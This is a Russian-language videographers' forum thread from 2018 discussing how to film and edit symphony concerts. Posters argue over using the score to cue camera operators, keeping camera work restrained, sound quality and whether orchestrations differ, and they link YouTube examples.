GH4,G6*2,7-14\4,12-35\2.8,35-100\2.8,14\2.5,25\1.8,45\1.8 Canon5DMarkII,Canon50\1.4,Canon 85\1.8,Canon24-70\2.8, Crane Plus, Phantom 4A,GoProHero3.

Дата публикации: 30-мая-2018   14:25
Два, не....., три момента)
У меня консерватория, видео больше любитель.

Когда учился и позже, в оперный театр, а так же на симф. концерты всегда ходили с партитурой (клавиром). Это обсуждать не надо, слишком много не понятного будет для неофитов.

Много с образованием, кто не знает симф. музыки, просто не знает и все, а еще они не могут читать партитуры. Посади такого режем, толку не будет.

Много "любителей", которые прекрасно разбираются и знают, просто воспитание, предрасположенность ну и ... любовь этому делу. Это был бы лучший вариант для режа.

Съемки и монтаж симф. концертов не подразумевают каких либо излишеств в виде глупого, не обоснованного моушена (в лучшем случае наезды, и то не торопливые), в основном крупности и статика. Это симфоническая музыка, ее слушают, отвлекать ни чего не должно, видео вторично.

Классика съемки и монтажа, например это -

https://www.youtube.com/watch?v=R1QNhRNxvTI" rel="nofollow - https://www.youtube.com/watch?v=R1QNhRNxvTI

Пример хорошей съемки, и глупого, не умелового поста, который смотреть невозможно (крыша едет)...( прошу отметить - Марьинский, Гергиев....(и видео вероятно официальное)) -

https://www.youtube.com/watch?v=J2G6WZ0VCP0&t=1337s" rel="nofollow - https://www.youtube.com/watch?v=J2G6WZ0VCP0&t=1337s

И последнее, главное - звук, и его обработка.

-------------

Дата публикации: 30-мая-2018   21:13
Главное знать когда и куда наводить камеру)Один оператор с кучей камер так не сможет

Дата публикации: 30-мая-2018   21:40
Было отправлено Serg1961 Serg1961 написал(а):

Консерваторское образование не обязательно на таких съемках. Джами правильно написал, главное уметь узнавать инструменты по тембру. Ну и общак и камера на зрительный зал - наше все!
Эх вы, "теоретики ПТС"... Big smile
Если работаешь в эфире или в запись через пульт, когда ты "услышал" инструмент - ты уже опоздал. Надо знать все произведение и хватать инструменты и/или группы в момент вступления, а не потом, когда "услышал" и нашел. Многие ли из вас в состоянии помнить классические композиции целиком, чтобы подсказывать оператором, что приготовить?

Впрочем, когда монтируешь записанный сразу на много камер материал, это уже не так важно.

-------------
Zhiyun Crane v.2

Дата публикации: 30-мая-2018   21:54
Конечно, всю классику знать и помнить невозможно.  Опять таки оркестровки одних и тех же произведений могут сильно отличаться.  Купюры тоже никто не отменял.

И именно поэтому желательно сидеть рядом с режем с партитурой, чтобы операторы заранее знали, кто будет вступать и кадрировались, как надо

.  

-------------
Кран "Alan LC 50". http://www.youtube.com/watch?v=nt8fqwu751U&feature=g-upl&context=G28d49e1AUAAAAAAABAA

Дата публикации: 31-мая-2018   14:10
Было отправлено Lucky Gonza Lucky Gonza написал(а):

Эх вы, "теоретики ПТС"... Big smile

Ага.., и партитур еще.

Было отправлено Djami Djami написал(а):

....  Опять таки оркестровки одних и тех же произведений могут сильно отличаться.  Купюры тоже никто не отменял. 

И именно поэтому желательно сидеть рядом с режем с партитурой, чтобы операторы заранее знали, кто будет вступать и кадрировались, как надо

Я вас уверяю, оркестровки (классики) - одни и те же (99%)! "Ремиксов" там не бывает.

Автору (и сомневающимся) -

Тот же концерт (3-Бетховена), что показывал выше, др. исполнение, но съемка более показательна, хорошо иллюстрирует, про что написал Гонза.

https://www.youtube.com/watch?v=-Tm0Phjiouk

-------------

Дата публикации: 31-мая-2018   16:35
В идеале да, очень ответственные концерты нужно и по особому снимать. Но вопрос стоял, как в одно лицо снять концерт более менее вменяемо. Я сам несколько раз снимал симфонический оркестр в муз. училище в 3 камеры и неплохо получалось. 

-------------

Дата публикации: 31-мая-2018   17:12
Есть еще один момент, эстетический.

На моих примерах оператор(ы) и камеры в кадр не попадают. 

Я слушаю по возможности много, на старых записях бывает, особенно которые на бэкграунде - лично меня отвлекает и портит общее впечатление от концерта.

Навтыкаете кучу камер, даже малышек (LX100 например) на "невидимых" штативах, все равно общую эстетику симфонического концерта ( заметьте, пишу концерта, а не картинки) будет это все портить.

-------------

Дата публикации: 31-мая-2018   22:54

Я вас уверяю, оркестровки (классики) - одни и те же (99%)! "Ремиксов" там не бывает.
Хм...  А Вы часто с зарубежными дирижерами работали?  Думаю, что нет. 

На своем опыте могу Вас уверить, что как Вы говорите, "ремейки" - довольно частое явление. 

-------------

Дата публикации: 01-июня-2018   10:03
Какие ремейки?  9 симфонии Бетховена, или Реквиема Моцарта? Или Ванесса Мэй?
Я про классику писАл, а не про инсталяции.

-------------

Дата публикации: 01-июня-2018   11:54

Конечно, всю классику знать и помнить невозможно
А как быть с современной музыкой? Где ни тональности, ни темы- вообще ни хрена не понятно порой...
Там снимай что в голову стукнет   

Дата публикации: 01-июня-2018   12:30
Вот это здорово снято.

-------------
---
Макинава фармит лёд

Дата публикации: 01-июня-2018   12:49
Сразу видно, что свадебщики снимали...)))

-------------

Дата публикации: 01-июня-2018   13:09

А как быть с современной музыкой? Где ни тональности, ни темы- вообще ни хрена не понятно порой...
Там снимай что в голову стукнет   

В "дурную" голову!) (извиняюсь).

А по сабжу, а вот так ! -

https://www.youtube.com/watch?v=5h5Xc-rUef4

пс у кого "сил" (интеллекта, фантазии, чувств и т.д.) хватит дослушать, можно обратить внимание, как срежесированно..., вплоть до выхода оркестра, а еще светом, палитрой, тенями и т.д. ( это Шенберг  "Ночь просветления"), ни каких вопросов не возникает вообще!, просто кайф и все, плюс "умные" операторы, монтажеры, ПТС_ники и т.д.Smile

добавил -

и звук приличный для ютуба.

-------------

Дата публикации: 01-июня-2018   15:32

Какие ремейки?  9 симфонии Бетховена, или Реквиема Моцарта? Или Ванесса Мэй?
Я про классику писАл, а не про инсталяции.
Если бы Вы читали мои сообщения не по диагонали, то должны были заметить, что я пишу про съемки в Оперном театре. И я повторяю - оркестровка классики порой сильно отличается от оригинала. Плюс купюры частенько встречаются, если Вы понимаете, что это и к чему ведет. 

Но суть моего появления в данной ветке - не спорить с кем-то. Я хотел рассказать о съемках при помощи партитуры. Насколько я понял, это до моего появления не обсуждалось. 

За сим, удаляюсь. 

ПС. Про запись звука я и не пишу т.к. понятное дело - звук в театре пишут профессионально. 
А этот театр, вообще, напичкан современным звуковым оборудованием, в наличии огромный парк микрофонов. И все это обслуживает целый штат звукорежиссеров и техников .
Если персонал европейского телеканала "Меццо" приезжает и работает без жалоб, то сами понимаете, там все пучком. 

-------------

Дата публикации: 01-июня-2018   15:44
Э.., маэстро, хамить не надо, я отвечал на конкретный пост, а держать в голове, применительно к вашему нику, где вы снимаете, или еще чего я не обязан, и голова у меня своя, и думает она не так как ваша, перечитайте тот свой пост, и включите логику.

На счет оперного согласен, только это не проблема вовсе.

А если уважаемый канал "Меццо" показывал "Онегина", по моей ссылке, то это уже не уважаемый канал (для меня).

-------------

Дата публикации: 01-июня-2018   16:08
Хамить - это как раз ближе к  Вашему стилю общения, а не моему. Перечитайте себя и, возможно, увидите...  Хотя, вряд ли. 

Меццо тоже разный бывает. Во-вторых, а кто без греха? 
Максимализм лучше пережить в подростковом возрасте. 

-------------

Дата публикации: 01-июня-2018   16:30
Djami,Вы бы почистили ПК у себя, а то какая-то абракадабра внизу сообщения!

-------------
Panasonic HC-X1,

Дата публикации: 01-июня-2018   17:24

Во-вторых, а кто без греха? 

Это не грех, это хуже). Миллионы почитателей теперь кушают это. Или это вы делали?

-------------

Дата публикации: 01-июня-2018   21:16
По поводу вот этого видео.
Ein schöner Tag / Schiller / Symphonia.
Во первых скажу, что музыка (с моей точки зрения, которую я никому не навязываю) - лажа полная!
Зачем там сидит оркестр, если звучит галимая электроника, причем не первой свежести... Оркестр что то там пиликает. Но на фонограмме нет даже этого пиликания. А операторы с усердием снимают контрабасы - которых в звуке тоже не слышно (если они вообще были...). Скрипки усердно "пилят" на видео - но их тоже не слышно. Проект весьма странный. Автор идеи и режиссер о чем думали?
Студийная фонограмма - и 80 человек оркестр для мебели. Зачем? Такой замах, столько светоприборов и выхлоп весьма сомнительный.

Дата публикации: 01-июня-2018   21:41
Ну это просто бзык режиссера. Показать типа нестандартную съемку и монтаж. Погоня за "индивидуальностью". Меня реально напрягли расфокусы и полиэкран... Музыка - это эмоция. А сосредоточенные рожи играющих никак не вяжутся с композицией. Поэтому я всегда предпочитаю музыку СЛУШАТЬ, а не смотреть. 

-------------

Дата публикации: 01-июня-2018   21:53
del

-------------

Дата публикации: 01-июня-2018   22:08
del

Дата публикации: 01-июня-2018   22:26

del

-------------

Дата публикации: 01-июня-2018   22:59
delete

Дата публикации: 01-июня-2018   23:02
Чтобы никто больше не сомневался о каком именно ролике я писал
Вот ссылка https://youtu.be/Os56r9OfOeE" rel="nofollow - https://youtu.be/Os56r9OfOeE
Я даже жирным шрифтом отметил Ein schöner Tag / Schiller / Symphonia

Дата публикации: 01-июня-2018   23:19
Igor Pink -

Игорь, примите публичные извинения, был не внимателен...

-------------

Дата публикации: 01-июня-2018   23:23

Igor Pink -

Игорь, примите публичные извинения, был не внимателен...

Принимается!

Дата публикации: 01-июня-2018   23:29
Smile

-------------

Дата публикации: 02-июня-2018   21:58
https://www.youtube.com/watch?v=veiyksPebfc
Мне что то напоминает... до боли знакомое

Распечатать страницу | Закрыть окно

Forum Software by Web Wiz Forums® version 12.01 - http://www.webwizforums.com